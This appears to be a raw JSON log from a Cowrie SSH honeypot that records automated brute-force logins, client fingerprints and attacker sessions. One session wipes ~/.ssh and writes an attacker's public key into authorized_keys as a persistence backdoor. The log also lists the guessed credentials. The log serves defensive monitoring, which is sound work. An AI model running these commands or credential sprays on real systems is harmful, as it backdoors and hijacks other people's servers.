{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:07:36.780691Z","src_ip":"212.227.235.229","session":"d5c913db014a"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis","message":"login attempt [francis/francis] failed","sensor":"my-vps","timestamp":"2025-08-28T02:07:38.749885Z","src_ip":"212.227.235.229","session":"d5c913db014a"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis1","message":"login attempt [francis/francis1] failed","sensor":"my-vps","timestamp":"2025-08-28T02:07:39.924904Z","src_ip":"212.227.235.229","session":"d5c913db014a"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis123","message":"login attempt [francis/francis123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:07:41.091246Z","src_ip":"212.227.235.229","session":"d5c913db014a"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis1234","message":"login attempt [francis/francis1234] failed","sensor":"my-vps","timestamp":"2025-08-28T02:07:42.683480Z","src_ip":"212.227.235.229","session":"d5c913db014a"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis12345","message":"login attempt [francis/francis12345] failed","sensor":"my-vps","timestamp":"2025-08-28T02:07:44.291195Z","src_ip":"212.227.235.229","session":"d5c913db014a"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:07:45.456316Z","src_ip":"212.227.235.229","session":"d5c913db014a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":9759,"dst_ip":"1.2.3.4","dst_port":22,"session":"c31dc6af8a48","protocol":"ssh","message":"New connection: 212.227.125.160:9759 (1.2.3.4:22) [session: c31dc6af8a48]","sensor":"my-vps","timestamp":"2025-08-28T02:08:11.925572Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:08:11.926805Z","src_ip":"212.227.125.160","session":"c31dc6af8a48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":10016,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fb643820224","protocol":"ssh","message":"New connection: 212.227.125.160:10016 (1.2.3.4:22) [session: 1fb643820224]","sensor":"my-vps","timestamp":"2025-08-28T02:08:12.040777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:08:12.041557Z","src_ip":"212.227.125.160","session":"1fb643820224"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T02:08:12.157105Z","src_ip":"212.227.125.160","session":"1fb643820224"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:08:12.505675Z","src_ip":"212.227.125.160","session":"1fb643820224"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T02:08:12.621311Z","session":"1fb643820224"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":34574,"dst_ip":"1.2.3.4","dst_port":22,"session":"91fc745bd79a","protocol":"ssh","message":"New connection: 194.233.79.134:34574 (1.2.3.4:22) [session: 91fc745bd79a]","sensor":"my-vps","timestamp":"2025-08-28T02:08:13.404882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:08:14.310138Z","src_ip":"194.233.79.134","session":"91fc745bd79a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:08:14.459145Z","src_ip":"194.233.79.134","session":"91fc745bd79a"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:08:15.425931Z","src_ip":"194.233.79.134","session":"91fc745bd79a"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:08:16.597009Z","src_ip":"194.233.79.134","session":"91fc745bd79a"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":6159,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c7b53c16709","protocol":"ssh","message":"New connection: 186.225.142.90:6159 (1.2.3.4:22) [session: 6c7b53c16709]","sensor":"my-vps","timestamp":"2025-08-28T02:08:56.760845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:08:57.185739Z","src_ip":"186.225.142.90","session":"6c7b53c16709"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:08:57.186692Z","src_ip":"186.225.142.90","session":"6c7b53c16709"}
{"eventid":"cowrie.login.success","username":"root","password":"0878464686","message":"login attempt [root/0878464686] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:08:59.487288Z","src_ip":"186.225.142.90","session":"6c7b53c16709"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:09:00.807688Z","src_ip":"186.225.142.90","session":"6c7b53c16709"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-28T02:09:00.808625Z","src_ip":"186.225.142.90","session":"6c7b53c16709"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"5.0","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:09:05.806403Z","src_ip":"186.225.142.90","session":"6c7b53c16709"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:09:05.807510Z","src_ip":"186.225.142.90","session":"6c7b53c16709"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:09:22.040971Z","src_ip":"212.227.125.160","session":"1fb643820224"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":52716,"dst_ip":"1.2.3.4","dst_port":22,"session":"29e1cb73a5e2","protocol":"ssh","message":"New connection: 194.233.79.134:52716 (1.2.3.4:22) [session: 29e1cb73a5e2]","sensor":"my-vps","timestamp":"2025-08-28T02:09:51.790817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:09:52.470303Z","src_ip":"194.233.79.134","session":"29e1cb73a5e2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:09:52.471020Z","src_ip":"194.233.79.134","session":"29e1cb73a5e2"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T02:09:55.861393Z","src_ip":"194.233.79.134","session":"29e1cb73a5e2"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:09:58.947601Z","src_ip":"194.233.79.134","session":"29e1cb73a5e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58826,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0a7611379ed","protocol":"ssh","message":"New connection: 212.227.235.229:58826 (1.2.3.4:22) [session: e0a7611379ed]","sensor":"my-vps","timestamp":"2025-08-28T02:10:38.439317Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:10:41.248084Z","src_ip":"212.227.235.229","session":"e0a7611379ed"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:10:41.249027Z","src_ip":"212.227.235.229","session":"e0a7611379ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57939,"dst_ip":"1.2.3.4","dst_port":22,"session":"854b65774cb0","protocol":"ssh","message":"New connection: 212.227.235.229:57939 (1.2.3.4:22) [session: 854b65774cb0]","sensor":"my-vps","timestamp":"2025-08-28T02:10:46.258934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T02:10:46.259877Z","src_ip":"212.227.235.229","session":"854b65774cb0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T02:10:46.548314Z","src_ip":"212.227.235.229","session":"854b65774cb0"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcde.12345","message":"login attempt [root/Abcde.12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:10:47.738228Z","src_ip":"212.227.235.229","session":"854b65774cb0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:10:48.420704Z","src_ip":"212.227.235.229","session":"854b65774cb0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T02:10:48.421384Z","src_ip":"212.227.235.229","session":"854b65774cb0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T02:10:48.422348Z","src_ip":"212.227.235.229","session":"854b65774cb0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:10:48.710532Z","src_ip":"212.227.235.229","session":"854b65774cb0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:10:49.368645Z","src_ip":"212.227.235.229","session":"854b65774cb0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T02:10:49.369376Z","src_ip":"212.227.235.229","session":"854b65774cb0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T02:10:49.659796Z","src_ip":"212.227.235.229","session":"854b65774cb0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:10:49.660801Z","src_ip":"212.227.235.229","session":"854b65774cb0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58783,"dst_ip":"1.2.3.4","dst_port":22,"session":"618d155cd2cb","protocol":"ssh","message":"New connection: 212.227.235.229:58783 (1.2.3.4:22) [session: 618d155cd2cb]","sensor":"my-vps","timestamp":"2025-08-28T02:10:49.918088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T02:10:49.919745Z","src_ip":"212.227.235.229","session":"618d155cd2cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T02:10:50.184551Z","src_ip":"212.227.235.229","session":"618d155cd2cb"}
{"eventid":"cowrie.login.success","username":"root","password":"Ubuntu2014!","message":"login attempt [root/Ubuntu2014!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:10:50.840800Z","src_ip":"212.227.235.229","session":"e0a7611379ed"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T02:10:51.247482Z","src_ip":"212.227.235.229","session":"618d155cd2cb"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:10:52.515480Z","src_ip":"212.227.235.229","session":"618d155cd2cb"}
